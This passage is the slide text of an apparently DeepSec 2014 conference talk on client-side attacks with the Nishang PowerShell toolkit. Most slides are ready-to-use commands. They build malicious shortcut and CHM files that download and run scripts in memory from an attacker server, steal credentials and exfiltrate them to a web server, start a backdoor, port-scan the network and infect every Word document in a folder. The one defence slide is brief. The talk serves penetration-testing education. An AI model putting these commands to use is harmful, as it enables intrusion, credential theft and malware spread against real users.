  • 31. Out-Shortcut.ps1 • Use below command to execute a PowerShell command: Out-Shortcut -Payload "-WindowStyle hidden -ExecutionPolicy Bypass - noprofile -noexit -c Get-ChildItem" • Use below command to download and execute, in memory, a PowerShell script: Out-Shortcut -PayloadURL http://192.168.254.1/Get-Wlan-Keys.ps1 DeepSec 2014 31
  • 32. Out-Shortcut.ps1 • If Out-Shortcut is executed on the target, we can set a Hotkey for the shortcut so that ot executed everytime the key is pressed: Out-Shortcut -PayloadURL http://192.168.254.1/powerpreter .psm1 -Arguments Check-VM - HotKey 'F3' -Icon 'notepad.exe' DeepSec 2014 32
  • 33. Out-CHM.ps1 • We could also use Compiled HTML Help files (CHM) to execute PowerShell commands and scripts. • When the target opens the CHM file, the predefined command or script is executed. • The target user will see a window flash/open. DeepSec 2014 33
  • 34. Out-CHM.ps1 • Use below command to execute a PowerShell command Out-CHM -Payload "Get-Process" - HHCPath "C:Program Files (x86)HTML Help Workshop" DeepSec 2014 34
  • 35. Out-CHM.ps1 • Use below command to execute encoded command/script. Out-CHM -Payload "- EncodedCommand <>" -HHCPath "C:Program Files (x86)HTML Help Workshop" Use Invoke-Encode from Nishang for encoding. DeepSec 2014 35
  • 36. Out-CHM.ps1 • Use below command to download and execute a script in memroy. Out-CHM -PayloadURL http://192.168.254.1/Get- Information.ps1 -HHCPath "C:Program Files (x86)HTML Help Workshop" DeepSec 2014 36
  • 37. More complex attacks • Any of the discussed, could be used for more effective attacks like: Out-Shortcut -PayloadURL http://192.168.254.1/powerpreter .psm1 -Arguments "Credentials | Do-Exfiltration –ExfilOption Webserver -URL http://192.168.254.183/test/data .php" DeepSec 2014 37
  • 38. More complex attacks • We could do some really cool stuff, like running a backdoor with a new communications channel Out-Shortcut -PayloadURL “http://192.168.254.1/Gupt- Backdoor.ps1” –Arguments "Gupt-backdoor -MagicString op3n – Verbose” DeepSec 2014 38
  • 39. More complex attacks • We could do Egress Testing Out-Shortcut -PayloadURL “http://192.168.254.1/FireBuster .ps1” –Arguments “FireBuster 192.168.254.1 4443-4447” DeepSec 2014 39
  • 40. More complex attacks • Other machines on the network could be port scanned. Out-Shortcut -PayloadURL “http://192.168.254.1/Port- Scan.ps1” –Arguments “Port-Scan - StartAddress 192.168.254.1 - EndAddress 192.168.254.254 - ResolveHost -ScanPort” • We could do a port scan for all the hosts in the current network segment, it is unlikely that we know the network range as in above example. DeepSec 2014 40
  • 41. More complex attacks • We could also run other client side attacks. For example, lets infect every word file in the C:client directory Out-Shortcut -PayloadURL “http://192.168.254.1/Out- Word.ps1” –Arguments “Out-Word - PayloadURL http://192.168.254.1/Speak.ps1 - WordFileDir C:client” DeepSec 2014 41
  • 42. More complex attacks • We could force browse or download and execute exploits to escalate privileges. • On Windows 8, we could dump web credentials stored in Windows Vault in plain text (admin privs required). • We could check if the current user has privileges to access other machines on the network. • And much more. DeepSec 2014 42
  • 43. Defense • Use awareness is the best defense against such attacks. • Removal of VBA from MS Office would help with the office document attacks. But it could break so many things. • Active monitoring of the user machines may also help in detecting such attacks. DeepSec 2014 43
  • 44. Conclusion • Usage of PowerShell makes these attacks much more lethal and powerful. • We need to not stick to getting a shell, we could go much further using only the client side attacks. • The attacks would continue as long as users continue opening attachments and click on links, that means, for ever :) DeepSec 2014 44
  • 45. Recommended PowerShell Tools • Nishang • PowerSploit • Posh-SecMod • Veil-PowerView • PowerUp • PoshSec • Kansa • Voyeur • Powercat DeepSec 2014 45
  • 46. Credits/Reference • Thanks to DeepSec for accepting me. • Macro code for MS Office documents has been taken from Matt’s work: https://github.com/enigma0x3 • The idea for Out-CHM is taken from this tweet and attached file: https://twitter.com/ithurricanept/status/5349 93743196090368 DeepSec 2014 46
  • 47. Thank You • Questions? • I am looking for contributors. • Nishang is available at https://github.com/samratashok/nishang • Follow me @nikhil_mitt • nikhil.uitrgpv@gmail.com • http://labofapenetrationtester.com/ 47

Editor's Notes

  • #20: Macro code from here http://enigma0x3.wordpress.com/2014/01/11/using-a-powershell-payload-in-a-client-side-attack/